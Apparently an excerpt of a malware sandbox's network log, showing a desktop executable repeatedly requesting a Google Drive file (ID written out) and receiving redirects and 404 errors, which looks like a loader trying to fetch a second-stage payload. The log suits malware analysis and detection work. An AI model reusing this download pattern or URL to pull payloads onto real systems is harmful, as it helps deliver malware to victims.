                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-BxtnlgEUqo9CQAdAi_9dJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:27 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="knM5YvpKBHTbPxenaBhTkA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      24 | 192.168.2.11 | 50004 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:28 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:28 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:28 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-ra6ekcHNUHz8AqYiwFzXVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      25 | 192.168.2.11 | 50005 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:29 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:29 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTsvZ5YG8_kx--AHuOva7NzYL1i08RPYiWIpef_iCTeDVhfOyBtB0GsA_2qf8PYEMKm
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:29 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-kHN33lFu72BShGpW51I3gA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:29 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IxcYK7J-Ow_JY7s8f8l_Lg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      26 | 192.168.2.11 | 50006 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:30 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:31 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:30 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-iIbLIyqDwvXHMy28tD_Abg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      27 | 192.168.2.11 | 50007 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:31 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:32 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC4_zGRq38DJbxSjMEtoyzJ7nzRxVC8JPPIxpocg3HUVjrF9j_o21eD24yzMhQfBIQMQ
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:32 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-iRdevWkGAm8sdGXYbHy-_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:32 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zuJUrZ-fbLjknZW6ytAzAQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      28 | 192.168.2.11 | 50008 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:32 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:33 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:33 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-pDsmKsePd-doQq1HXRjUBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      29 | 192.168.2.11 | 50009 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:33 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:34 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQXvR-tNun8oF6h2AJeaiM-s_JBDeo1NU9sAJFSmQacNubRX_LWFOvDadNiIAOsQr8xuGKw_9c
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:34 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Sr-QOMmIQmf3bT0lgyT03g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:34 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hv0iE8jxv6HYk-aYMXrvFg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      30 | 192.168.2.11 | 50010 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:35 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:35 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:35 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-O6PHzXdKzQlb11snWSF4FQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      31 | 192.168.2.11 | 50011 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:36 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:36 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRra7MWenIshM3a-QP2-m8yXQFvprUxQzcmwhIrcVXR1PcE1StUuTPeV-Wo1ZGvFV5qvh2q58M
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:36 GMT
                                                      Content-Security-Policy: script-src 'nonce-7A2aM0fmOZd6YDBTFBZkMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:36 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HV-lvyGR61IIWhixJA7x-A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      32 | 192.168.2.11 | 50012 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:37 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
